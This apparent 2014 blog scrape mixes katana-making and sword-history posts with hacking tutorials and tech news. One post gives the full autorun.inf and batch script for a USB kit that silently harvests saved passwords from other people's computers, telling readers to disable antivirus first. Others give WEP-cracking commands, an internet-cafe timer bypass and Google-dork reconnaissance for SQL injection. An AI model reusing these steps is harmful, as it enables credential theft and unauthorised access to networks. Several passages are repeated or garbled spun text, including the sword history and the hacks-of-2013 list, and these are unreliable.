WW2 Japanese Arisaka Bayonet Kakura
|
Saturday, 22 March 2014
WW2 Japanese Arisaka Bayonet Kakura
Friday, 21 March 2014
KATANA (samurai sword)
he authentic Japanese sword is made from a specialized Japanese steel called "Tamahagane" which consist of combinations of hard, high carbon steel and tough, low carbon steel. There are benefits and limitations to each type of steel. High-carbon steel is harder and able to hold a sharper edge than low-carbon steel but it is more brittle and may break in combat. Having a small amount of carbon will allow the steel to be more malleable, making it able to absorb impacts without breaking but becoming blunt in the process. The makers of a katana take advantage of the best attributes of both kinds of steel. This is accomplished through a number of methods, most commonly by making a U-shaped piece of high-carbon steel (the outer edge) and placing a billet of low-carbon steel (the core) inside the U, then heating and hammering them into a single piece. Some sword-makers use four different pieces (a core, an edge, and two side pieces), and some even use as many as five.
The block of combined steel is heated and hammered over a period of several days, and then it is folded and hammered to squeeze the impurities out. Generally a katana is folded no more than sixteen times, then it is hammered into a basic sword shape. At this stage it is only slightly curved or may have no curve at all. The gentle curvature of a katana is attained by a process of quenching; the sword maker coats the blade with several layers of a wet clay slurry which is a special concoction unique to each sword maker, but generally composed of clay, water, and sometimes ash, grinding stone powder and/or rust. The edge of the blade is coated with a thinner layer than the sides and spine of the sword, then it is heated and then quenched in water (some sword makers use oil to quench the blade). The clay slurry provides heat insulation so that only the blade's edge will be hardened with quenching and it also causes the blade to curve due to reduced lattice strain along the spine. This process also creates the distinct swerving line down the center of the blade called the hamon which can only be seen after it is polished; each hamon is distinct and serves as a katana forger's signature.
The hardening of steel involves altering the microstructure or crystalline structure of that material through quenching it from a heat above 800 °C (1,472 °F) (bright red glow), ideally no higher than yellow hot. If cooled slowly, the material will break back down into iron and carbon and the molecular structure will return to its previous state. However, if cooled quickly, the steel's molecular structure is permanently altered. The reason for the formation of the curve in a properly hardened Japanese blade is that iron carbide, formed during heating and retained through quenching, has a lesser density than its root materials have separately.
After the blade is forged it is then sent to be polished. The polishing takes between one and three weeks. The polisher uses finer and finer grains of polishing stones until the blade has a mirror finish in a process called glazing. This makes the blade extremely sharp and reduces drag making it easier to cut with. The blade curvature also adds to the cutting power.
The block of combined steel is heated and hammered over a period of several days, and then it is folded and hammered to squeeze the impurities out. Generally a katana is folded no more than sixteen times, then it is hammered into a basic sword shape. At this stage it is only slightly curved or may have no curve at all. The gentle curvature of a katana is attained by a process of quenching; the sword maker coats the blade with several layers of a wet clay slurry which is a special concoction unique to each sword maker, but generally composed of clay, water, and sometimes ash, grinding stone powder and/or rust. The edge of the blade is coated with a thinner layer than the sides and spine of the sword, then it is heated and then quenched in water (some sword makers use oil to quench the blade). The clay slurry provides heat insulation so that only the blade's edge will be hardened with quenching and it also causes the blade to curve due to reduced lattice strain along the spine. This process also creates the distinct swerving line down the center of the blade called the hamon which can only be seen after it is polished; each hamon is distinct and serves as a katana forger's signature.
The hardening of steel involves altering the microstructure or crystalline structure of that material through quenching it from a heat above 800 °C (1,472 °F) (bright red glow), ideally no higher than yellow hot. If cooled slowly, the material will break back down into iron and carbon and the molecular structure will return to its previous state. However, if cooled quickly, the steel's molecular structure is permanently altered. The reason for the formation of the curve in a properly hardened Japanese blade is that iron carbide, formed during heating and retained through quenching, has a lesser density than its root materials have separately.
After the blade is forged it is then sent to be polished. The polishing takes between one and three weeks. The polisher uses finer and finer grains of polishing stones until the blade has a mirror finish in a process called glazing. This makes the blade extremely sharp and reduces drag making it easier to cut with. The blade curvature also adds to the cutting power.
Secrets of the Samurai Sword(full documentary)HD
English people archers had longbows, West old sheriffs had 06 guns,but Japan's samurai warriors had the most fearsome weapon of all: the razor-sharp, unsurpassed technology of the katana, or samurai sword. In this program, NOVA probes the centuries-old secrets that went into forging what many consider the perfect blade. Fifteen traditional Japanese craftsmen spent nearly six months creating the sword that NOVA follows through production, from smelting the ore to forging the steel to sharpening the blade to a keen edge capable of slicing through a row of warriors at one swoop.
Saturday, 15 March 2014
Aragami - Best Samurai Sword fight scene
History of the japanese sword
Archaeological evidence indicates that brand have existed in Nihon for its entire historical period. Shortstop heterosexual person brand imported from People's Republic of China and Korea are among the earliest weapon system found in historical sites around Japan. After 2000 B.C., when these steel first appeared, the Japanese Begin making their own steel . Around 700 A.D., Japanese swordJulia Evelina Smith forged the first of what are now considered the finest swords ever shuffle . The person considered responsible for vastly improving Japanese sword design and fabrication was a smith named Amakuni. Like others in his profession, he was responding to the huge demand for weapon shuffle by local, provincial, and national leaders . Regional conflicts over land rights and topic of power continuously erupted, and, when not state of war among themselves, the early Japanese were invading the Korean peninsula or China, or defending themselves against Korean and Chinese For more photo visit - All photographs are copyright of their respective proprietor invaders. Any leader with a supply of superior weapons was at a great vantage , so a invariable , long-full term travail to find swordmakers improving the craft ensued. The most devoted smiths made the quest for the perfect blade into a life pursuit, and men exist today who devote their lives to the graphics of swordmaking. The long sword in Japan has seen three major avatar , and for each type of sword exists a fighting style to match the blade's conformation . The early leaf blade , called chokuto or â€Ĺ“straight swords,†tended to get longer as metallurgy techniques improved. Though not much is known about how these weapons were wielded, the extra length - without any significant increase in weight unit - certainly give the fighter more grasp . The script grip size of these blades suggests that they were hold in one hand. The two-edged blade suggests a jab and hacking style of fighting. The first major change in the shape of the sword came during Amakun
Thursday, 30 January 2014
Wednesday, 22 January 2014
How to hack password using usb
Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit: MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more… PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename
Here is a step by step procedre to create the password hacking toolkit: NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it: [autorun] open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it: start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps 1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option (Perform a Virus Scan). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7 NOTE: This procedure will only recover the stored passwords (if any) on the Computer
Folder lick with out any software
Folder Lock Without Any Software :Folder Lock With Password Without Any SoftwarePaste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do. Then you see a batch file. Double click on this batch file to create a folder locker. New folder named 'Locker' would be formed at the same location. Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'. If you want to unlock your files,double click the batch file again and you would be prompted for password. Enter the password and enjoy access to the folder. if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your password here goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End
Tuesday, 21 January 2014
How to grab IP address with PHP
Today I’ll be showing you how to grab somebodies IP address when they visit a page. The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it for just about anything, here are a few examples. Printing the Users IP Address: <?php print ($_SERVER['REMOTE_ADDR'], "I'm Watching You!"); ?> Printing it to a File: <?php $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen('ipaddresses.txt'', 'a+); fwrite($handle, $ip); fwrite($handle, "\n"); fclose($handle); ?> All you have to do, is to make a text file and insert any of these codes or one of your own and save it as anythingyouwant.php Then upload it to your website and it'll do the trick :P The Possibilities for what you can use this to are endless. Good luck :D
How to get unlimited time in Internet Café'
Today we're going to learn how to disable the timer on the computers in Internet Cafe's. Let's go through the steps, shall we? 1. Create a New Text Document. 2. Then type CMD in it. 3. And then save it as anything.bat (Make sure the file do NOT end on .txt, but on .bat) 4. Go to the location were you saved the .bat file and run it. If you've done this correctly, you'll see that Command Prompt is open. 5. Now that Command Prompt is open, type in: cd\windows (This will change the directory to Windows) 6. Then type in: regedit (This will get you to the registry editor gui) 7. Now navigate to: HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system 8. Then on the right pane where it says Disable Taskmanager, right click on it, and scroll down to modify, and than change the value of it to "0". 9. And then open Windows Task Manager (CTRL+ALT+DELETE) 10. And then disable the Internet Cafe's timer. If you did this right, then you're done! Well done :D
How to access blocked websites in Pak humanity / 34 days ago
India became acquainted, though maybe not willingly, with Ashok Kumar or India’s John Doe a few months before. The unimaginative name, suitably so, has taken on painful significance for Internet users. It’s on the back of an Ashok Kumar court order that Internet service providers (ISPs) have blocked torrent sites.
But also affected were legitimate video sharing sites such as Dailymotion and Vimeo. These are frequently used by creative professionals to share their commercial content.
Now, while we do not condone the use of torrent and video-sharing sites to share copyrighted content, there’s a fair case to be made that it isn’t the medium that should be punished. It is the very same medium that lets you download tonnes of copyright-free content fast and easy. So, for those who have been inconvenienced by over-zealous ISPs, here are a few tips to access such blocked content.
For example we wanna get access to zedge.net or adf.ly shortened urls,
Step 1 : Open the URL http://unblocksit.es
Step 2 : Provide the input of the URL you want to access and hit Go.
And it was as simple as that, get access to any of the websites which are blocked any where, this tip will work all over the world and not only in india.
you can use this to access facebook, twitter or any other sites which are blocked by your ISPs or the local network administrator.
Hope you enjoyed the trick.
Apple releases iOS 7.0.2, fixes lock screen security bug Pak humanity / 116 days ago
Apple has released an update for iOS 7 – iOS 7.0.2. The update fixes a bug that let users bypass the passcode security lock screen. The issue was discovered in a matter of hours after iOS 7 was released to the public.
The OS update reads, “Fixes the bug that could allow someone to bypass the lock screen passcode. Reintroduces a Greek keyboard option for passcode entry.”
Passcode on the lock screen gives you a basic level of security. When the passcode is active, no one can access the content on your phone, unless they know the passcode. Bypassing the passcode on iOS 7 was a bit tricky. Users needed to access the control center by swiping up from the bottom of the display and accessing the alarm clock. After that, hold the power button for a while which will give you the option to switch off the phone. Cancel that option. After than you can double tap the home button to bring up the multitasking menu, which will give you access to the camera and stored photos along with any logged-in email and social networking accounts.
If you haven’t updated your iOS device to 7.0.2, you can do so by going into the settings option, then “General,” and selecting “Software Update.”
Marketplaces vs. Online Sellers: A Story of Broken Promises Hacking Tech / varunkrmit / 34 days ago
E-commerce marketplaces are to online sellers what shopping complexes are to retailers.
Marketplaces have not only levelled the ecommerce playing field for SMBs but also provided so much more visibility to these niche brands that are taking the online shopping industry by storm.
So naturally, when an online marketplace, let’s call them ScamTag.com for namesake, approached Saumya Gupta to host her brand, Ten On Ten’s apparel on their marketplace, she was more than stoked. With an online presence, spanning from her own online store to selling on bigger marketplaces like Flipkart, Myntra and ShopClues, this was more than a welcome move.
Saumya Gupta, like so many entrepreneurs today, is the one-woman show behind her very own successful apparel brand, Ten On Ten Clothing. From scooting the bazaars of Mumbai for raw materials to taking customer calls at 2 in the night, she is CEO to customer service executive all rolled into one.
The first couple of months of tying up with ScamTag did brilliantly for Ten On Ten. Saumya was seeing a flurry of orders coming in from ScamTag and was happy about the exposure and the subsequent customer interest Ten On Ten was gathering.
Without complaints, she diligently processed the orders she received, undertook a quality check at her end to keep up with the belief that only the best reach the customer and never came across an unhappy customer. All was hunky dory! Until, the day, she asked the team at ScamTag to pay her for the orders she had processed and the stock they still had at their warehouses, which summed up to a total of Rs. 1.8 lacs! Only to be denied what she had rightfully earned as an entrepreneur, even after having signed an MoU with ScamTag.
So what the hell happened?
ScamTag refused to settle all payments for Ten On Ten citing reasons like repetitive customer complaints, return of goods by the customers and products not meeting their quality checks. All of which, Saumya, was not even once informed about.
Once ScamTag refused payment to Saumya, she had no option but to take a legal recourse. And even then ScamTag.com did not straighten their act. From the company complaining to having never received the signed MoU, to managers acting as CEOs, to even going to the lengths of stalking Saumya on WhatsApp (!), they must have tried every trick in the trade to get to her to withdraw her demand for getting paid!
Finally after haggling between their respective lawyers and much threat, over a period of 3 months, the company returned 1.1 lac in cash out of the 1.8 lacs they owed her. And returned goods worth Rs. 70,000! How is an entrepreneur supposed to react to such a scenario, other than completely giving up faith in online marketplaces?
Should you be wary of all online marketplaces?
To understand the same, a little backdrop into how marketplaces operate is needed. You see, traditional online marketplaces are nothing but a collection of online shops, much like a shopping complex. Each brand maintains its own shop and controls its own inventory. And the best part about it being, other than the low commission of around 10%-12% per sale, is that the store owner knows exactly who the customer is! They can directly interact with the customer, address concerns and redress returns accordingly.
However, in the case of marketplaces like ScamTag, they are a “shopping website that hosts flash sales”. To give you a fairer idea, such marketplaces work on the basis of purchase-order. A customer buys a product on their website and the marketplace raises a purchase order for the same. Once the brand owner, in this case Saumya, receives the purchase order, the order is processed, quality checked and sent back to ScamTag which subsequently sends it to the customer. The downside to such a model being that the store owner is never in touch with the end customer and has to rely completely on the marketplace to act as a mediator, which operates on anything around 30% to 60% commission per sale.
As a word of advice to fellow entrepreneurs, Saumya strongly suggests, reading between the lines before signing MoUs of any kind and better still, always having a lawyer look at the documents you are about to sign. And always choosing wisely about whom to do business with.
Even though ScamTag was a relatively new venture, Saumya saw an opportunity and went for it. But only to be disappointed. Today, she has sworn-off marketplaces that work on the purchase-order or flash sales model completely, standing firmly in favour of inventory-based marketplaces or rather selling via her own online store.
This post is not a discouragement for anyone wanting to sell on online marketplaces. On the contrary, we advice online sellers to sell at online marketplaces too, in order to get that more visibility for their brand and grow their sales. But as a final word of advice, when choosing a marketplace to sell on, make sure you choose wisely and do a thorough background check on the company you’re about to tie-up with. Also, do read all agreements very carefully and better still have a lawyer look into the same.
Have you endured something like that? What is your take on the entire episode? Do drop in and join in the conversation in the comments below! Let this be a word of advice for all fellow entrepreneurs and e-tailers.
This post was originally published on Zepo: The eCommerce Blog for Small Businesses
How to hack wifi wep with Backtrack 5 . Pak humanity / nahdiaameen / 84 days ago
Download Backtrack. Its a Linux operting system. You can download it by searching on Google simply then it is make bootable by usb by simply viewing the ubentu video on YouTube. Then it is able to use
TERMINAL COMMANDS:
startx
GO TO TASKBAR AND CLICK ON THE COMMAND CONSOLE ICON:
/etc/init.d/networking start
airmon-ng
CHECK THE NAME OF THE WIRELESS CARD:
airmon-ng stop [wireless card name] airmon-ng start [wireless card name] airmon-ng (to see the changes)
airodump-ng [wireless card name] ctrl c
airodump-ng -w wep -c [channel number] –bssid [Bssid number] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -1 0 -a [bssid] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -3 -b [bssid][wireless card name]
BRING UP 1ST CONSOLE:(run until data +30,000)
BRING UP CONSOLE SENDING/RECEIVING DATA:
ctrl c
dir
LOOK FOR FILE ENDING IN .cap
aircrack-ng [filename]
THIS WILL GIVE THE WIRELESS KEY!
Google’s Nexus 5 smartphone debuts as first with Android ‘KitKat’ Hacking Tech / Chirag Desai / 81 days ago
Google’s highly anticipated Nexus 5 is the first smartphone with the latest Android 4.4 OS code-named KitKat.
Few phones have been preceded by so many rumors and purported leaks as Google’s latest smartphone, which was launched Thursday along with the latest version of Android. The phone, like the Nexus 4, is manufactured by LG Electronics.
The phone has a 4.95-inch full high-definition display and is available unlocked for $349. The smartphone is the “slimmest and fastest Nexus phone ever made,” wrote Sundar Pichai, senior vice president of Android, Chrome and Apps at Google, in a blog entry.
The smartphone weighs 136 grams (about 4.8 ounces) and is 8.59 millimeters (0.3 inches) thick. It has a Qualcomm Snapdragon 800 processor running at 2.3GHz and has LTE mobile connectivity, which is an important differentiator from Nexus 4, which was announced at this same time last year. The lack of LTE network technology in the Nexus 4 came as a surprise to many.
The Nexus 5 provides 17 hours of talk time and 8.5 hours of Internet browsing on a Wi-Fi network, with seven hours on an LTE network.
The Nexus 5 also has a new camera that can take sharper pictures and keep images stable. The device has an 8-megapixel rear camera and a 1.3-megapixel front camera.
“A new HDR+ mode automatically snaps a rapid burst of photos and combines them to give you the best possible single shot,” Pichai wrote.
Other features include 16GB to 32GB of storage, 2GB of RAM, a micro-USB port. It supports 802.11ac Wi-Fi wireless networking.
The smartphone is available through the Google Play store in the U.S., Canada, U.K., Australia, France, Germany, Spain, Italy, Japan and Korea, and will be coming to India “soon,” Pichai wrote.
Some software enhancement in KitKat include the “Phone” app, which makes it easier for users to access contacts and make calls. The “Hangout” app enables videoconferencing, and also stores SMS and MMS messages. Like Motorola’s Moto X, the smartphone has the Google Now application for voice-related commands and search.
The Nexus family of smartphones is still deeply strategic for Google, according to Geoff Blaber, CCS Insight’s vice president of research for the Americas.
“In essence what we are seeing emerge is a two-tier strategy, with devices such as the Samsung Galaxy S4 and the HTC One with a vanilla Google experience on one end, and then at the other end the Nexus products, which are about offering strong hardware with a very aggressive price,” he said.
The top 10 most important hacks of 2013 Hacking Tech / Chirag Desai / 23 days ago
It’s positively been a full of activity year for scammers and hacker, moreover so we thinking we’d gather together the high-profile hacks which prepared headlines this year. Go through this article for our top ten safety breaches of 2013…
1. Adobe
In near the beginning of October, Adobe disclosed that it was the sufferer of a hack that influenced in the region of 3 million users. The cheaters made off with consumer names, encrypted debit or credit card numbers, cessation dates, as well as other information connecting to consumer orders.
The software firm too alleged that “source code intended for plentiful Adobe products” was stolen in a split intrusion that might be associated to the robbery of customer data. Later, on the other hand, Adobe admitted that the violation actually bowled 38 million users. Oops.
2. Syrian Electronic Army
The Syrian Electronic Army appeared in September 2012, although it was relatively tiring this year aiming the societal media descriptions of diverse media channels that the SEA supposed was publishing editorials considerate to Syrian rebels, counting the Financial Times, the New York Times, , the BBC, the Guardian plus, even The Onion. It moreover managed to receive the New York Times web page offline in the month August. (Honorable mention: Hacking the Jeep Twitter and Burger King feeds).
3. Chinese hackers
In the month January, the New York Times discovered that it had been the goal of Chinese hackers for no less than four months. The invaders were supposedly in search of particulars in relation to sources to whom Times’ journalists conversed to for an October narrative about the prosperity of Wen Jiabao, China’s prime minister.
The subsequent month, security investigators from Mandiant sketched a inexhaustible group of supercomputer hackers to a government-backed, martial structure in Shanghai, China. The firm alleged the People’s Liberation Army Unit 61398 is sited “in specifically the similar area” as a part of APT1, an proceeded persistent hazard (APT) grouping that has stolen thousands of terabytes of memory data as of at least 141 organizations universally.
4. JPMorgan
Previous to this month, JPMorgan declared that 465,000 persons using prepaid currency cards issued through the bank possibly will have covered their individual data uncovered in an infringe. JPMorgan notified exaggerated cardholders, concerning 2 per cent of the whole 25 million citizens who cover UCards in addition to used the UCard Centre webpage amid July along with September. (Honourable declare: Evernote’s March contravenes along with LivingSocial’s April hack).
5. Zombies!
This hack was added amusing than monetarily devastating for users, but it did emphasize a disadvantage in America’s urgent situation alert process. In February, somebody hacked keen on the Emergency Alert System as well as announced on KRTV in addition to the CW within Montana so as to the zombie catastrophe was upon the first-class citizens of the US. The note kicked off resembling any other urgent situation alert – with dial up-esque bleeps along with tones and an attentive crawl atop the display. But relatively than forewarning about weather conditions emergency or else some further plausible position, an alarming voice came on to caution people concerning zombies. Rest guaranteed that there were no zombies. Not up till now, anyway.
6. US government hacks
Above in the States, the feeds were not protected to crooks or hackers this year, with more than a little government agencies falling victim to Internet violators, counting the Energy Department, the Federal Reserve, in addition to even the societal media accounts of previous Secretary of State Colin Powell.
7. Zuckerberg’s wall
If you don’t boast $100 (£60) to catch Mark Zuckerberg’s concentration, why not scam his Facebook timeline wall? That’s what Palestinian safety investigator Khalil Shreateh did following he discovered a malfunction in the Facebook surrounding substance that would purportedly allow any person to place to the Facebook walls of several other addict. Subsequent to Facebook ignored his cautions, he determined to take benefit of the development and post particulars of the post on the CEO’s facebook wall. Facebook later on fixed the glitch, but refused to provide Shreateh a $500 (£300) bug reward.
8. Apple developer website
Apple gets its developer medial offline in late July, whilst a suspected hacker endeavored to embezzle personal data from the corporation’s record. While the statistics was encrypted with “cannot be accessed,” Apple supposed, there was several concerns that “developers’ names, sending addresses, with/or email addresses possibly will have been admittances.” An refurbished version of the website responsed online in median-August.
9. Facebook plus Apple malware
In the month February, Facebook alleged its safety team had revealed that Facebook’s coordination was “targeted in a complicated attack.” It occurred “when a set of workers stopover a mobile developer webpage that was negotiated,” Facebook alleged. Some days afterward, Apple completed the rare access that it as well was the prey of hackers, assaulted by the similar online criminals who besieged Facebook. No consumer records was stolen as of either corporation, however.
10. Anonymous v/s North Korea
In the month April, North Korea’s certified Twitter plus Flickr explanations were hacked, supposedly as component of “hacktivist” set Anonymous’ efforts to disturb the Communist state’s web attendance. The attackers embattled North Korean head Kim Jong-un in a sequence of tweets plus photos that depicted him in a fewer-than-flattering beam.
India’s own Spying PRISM “Netra” coming soon
Think twice before using some words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ in your Facebook status update, tweets or emails, because this may flag you as a potential terrorist under a surveillance project of Indian Security agencies. This Indian Internet surveillance project named as NETRA (Network Traffic Analysis), capable of detecting and capture any dubious voice traffic passing through software such as Skype or Google Talk, according to the Economic Times. In Hindi, NETRA means “eye” and this project is an Indian version of PRISM i.e. A spying project by US National Security Agency (NSA), that also allows the government to monitor the Internet and telephone records of citizens.
Reportedly, NETRA is under testing right now by the Indian Intelligence Bureau and Cabinet Secretariat and after on success will be deployed by all Indian National security agencies. Centre for Artificial Intelligence and Robotics (CAIR), a lab under Defence Research and Development Organisation (DRDO) is still hardworking on ‘Netra’ project to give it extraordinary features like NSA’s PRISM. One of the fun fact about the project is that, NETRA is defined to use only 300 GB of storage space for storing the intercepted internet traffic… Are they serious..? HOW is it POSSIBLE? and this data will be shared with only maximum three security agencies, including the Intelligence Bureau (IB) and Cabinet Secretariat. At this time, even I am not sure that what does they mean by “300 GB of storage space”, but we are trying to contact DRDO guys for more further information on this matter.
Anyway, NSA has a 100,000 square foot “mission critical data center”, where they are intercepting 1.7 billion American electronic records and communications a day, using 5 Zettabytes (1 Trillion GB) space to keep every information stored for next 500s years at least.
Also some questions arise here that:
Do they have the capability to handle and analyze such huge amount of data? (If it is not 300GB only)
Other than terrorist attacks, will they also deal with Computer Security Incidents and vulnerabilities?
What does that 300 GB of storage space mean?
The government should clear the objectives and ability of the NETRA project. Because according to the population of Internet users in India, words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ will trigger RED ALARM millions of times a day and if they don’t have the capability to trace down right mischief people, rather than disturbing elements, which may purposefully divert the attention of security agencies for various means.
Another major concern is Privacy, unwarranted digital intrusions and interference with citizens’ online communications.
Forbes India reported that, India has more than around 50 different laws, rules and regulations that aim to uphold privacy and confidentiality in various domains. Unfortunately, most of those policies are very dated and do not sufficiently take into account the challenges of contemporary information societies.
Do they believe that secrecy, confidentiality and, most importantly, privacy, must be sacrificed for national security? Bruce Schneier, security technologist said before,“There is no security without privacy. And liberty requires both security and privacy.”
Microsoft’s Twitter News account hacked by Syrian Electronic Army
Microsoft’s Twitter account was hacked by the Syrian Electronic Army just after the attacks on Xbox Twitter and Instagram, right as our calendars turned over to 2014. The Syrian Electronic Army hacked the Microsoft News Twitter account and posted a tweet stating that the company sells the user data to the government.
“Don’t use Microsoft emails(hotmail,outlook),They are monitoring your accounts and selling the data to the governments. #SEA @Official_SEA16,” the message read.
This is the second time that Microsoft’s accounts were hacked by the Syrian Electronic Army. It had hacked Microsoft’s Xbox Twitter account, Skype’s Twitter and Facebook accounts on New Year Eve’s. Microsoft, which owns Skype, had to issue a warning to discourage people from using Microsoft emails following the New Year’s Day hack.
After attacking Microsoft’s Twitter News account, The “Official Microsoft Blog,” blog was also hacked and displayed SEA messages, and redirected to the hacking group’s website for at least some users.
In response to the cyber attacks a Microsoft spokesperson stated, “Microsoft is aware of targeted cyber attacks that temporarily affected the Xbox Support and Microsoft News Twitter accounts. The accounts were quickly reset and we can confirm that no customer information was compromised.”
Recently popular messaging Snapchat was hacked and more than 4.6 Million users id’s were leaked online. Snapchat has now released an updated version to prevent future attacks. The app now allows users to opt out of ‘Find Friends’ feature that stores the usernames and phone numbers. The company has even set up an email address so white-hat hackers can use to notify the company of potential exploits:
Social hacking
Search Engine Hacking
Search engines, by definition, are used to find and locate information on the World Wide Web. In addition to using search engines to search for information, attackers have ways of using search engines to identify and locate vulnerabilities and confidential data.
Using search engines to find vulnerabilities offers a way for attackers to probe a network without the target’s knowledge since the entire search request and response come from the search engine and not the target. The attacker doesn’t leave a footprint since he is not sending information to the target. Attackers also use a cached page to view the information, instead of accessing the site directly, which creates another layer of protection for them.
Google Hacking
Numerous books and presentations discuss how to gather “sensitive” information from Google. Attackers can use Google to gather basic information such as contact lists, internal documents, and top-level organizational structures, as well as locate potential vulnerabilities in an organization’s web application.
Attackers can use a specific type of search query, called a dork, to locate security issues or confidential data. Attackers can use dorks to obtain firewall logs and customer data, and to find ways to access an organization’s database.
Security professionals have developed public databases of dorks. Dork databases exist for several different search engines; the most common dork database is the Google Hacking Database.
Note
The Google Hacking Database (GHDB) is a great resource for finding dorks that can aid an attacker. The GHDB is located at http://johnny.ihackstuff.com/ghdb/.
Using a dork is relatively simple. An attacker locates a dork of interest, and then uses Google to search for the dork. The following code is a dork that attempts to identify web applications that are susceptible to an SQL injection vulnerability by searching for a MySQL error message that commonly signifies the existence of an SQL injection flaw:
"Unable to jump to row" "on MySQL result index" "on line"
An attacker can limit the dork to a certain domain by adding the site: directive to the query string. For example, here is a Google query that is limited to the example.com domain:
"Unable to jump to row" "on MySQL result index" "on line" site:example.com
Figure 1-4 illustrates the execution of the SQL injection dork. Notice that more than 900,000 results were returned!
Figure 1-4. Execution of an SQL injection dork
Automating Google Hacking
An attacker can use the Search Engine Assessment Tool (SEAT), developed by Midnight Research Labs, to automate Google hacking. SEAT uses search engines and search caches to search for vulnerabilities for a particular domain.
SEAT supports multiple search engines, including Google, Yahoo!, and MSN. SEAT also has a variety of built-in dorks. The databases that SEAT uses (shown in Figure 1-5) were compiled from multiple sources, including the GHDB and Nikto.
An attacker can select multiple databases and search engines when using SEAT. Along with SEAT’s multithreading, these features aid the attacker greatly when he’s gathering information via search engine hacking. Figure 1-6 shows SEAT during the execution stage running 15 simultaneous queries.
Note
You can obtain the latest version of SEAT from http://midnightresearch.com/projects/search-engine-assessment-tool/.
Extracting Metadata from Online Documents
Metadata is “data about other data.” A good example of metadata is the data that is often inserted into Microsoft Office documents such as Word. For instance, Microsoft Word inserts data such as usernames and folder paths of the author’s machine. Attackers can extract this metadata from documents that corporations have put online.
Using search engines, attackers can use specific directives to limit their results to specific file types that are known to include metadata. For example, the Google directive filetype:doc will return only Microsoft Word files. The following is a query that returns only PowerPoint presentations that contain the phrase “Q4 Expenses”:
filetype:ppt "Q4 Expenses"
Figure 1-5. SEAT’s different built-in vulnerability databases
Attackers query Google using such queries; then they download the documents that are returned and examine them, pulling out any metadata stored within them.
Metagoofil is an automated tool that queries Google to find documents that are known to contain metadata. Metagoofil will query Google using a specific domain, download the files that are returned, and then attempt to extract the contents. Here is a demonstration of Metagoofil being used against example.com:
$ python metagoofil.py -d example.com -f all -l 3 -o example.html -t DL
*************************************
*MetaGooFil Ver. 1.4a *
*Coded by Christian Martorella *
*Edge-Security Research *
*cmartorella@edge-security.com *
*************************************
[+] Command extract found, proceeding with leeching
[+] Searching in example.com for: pdf
[+] Total results in google: 5300
[+] Limit: 3
[ 1/3 ] http://www.example.com/english/lic/gl_app1.pdf
[ 2/3 ] http://www.example.com/english/lic/gl_app2.pdf
[ 3/3 ] http://www.example.com/english/lic/gl_app3.pdf
[+] Searching in example.com for: doc
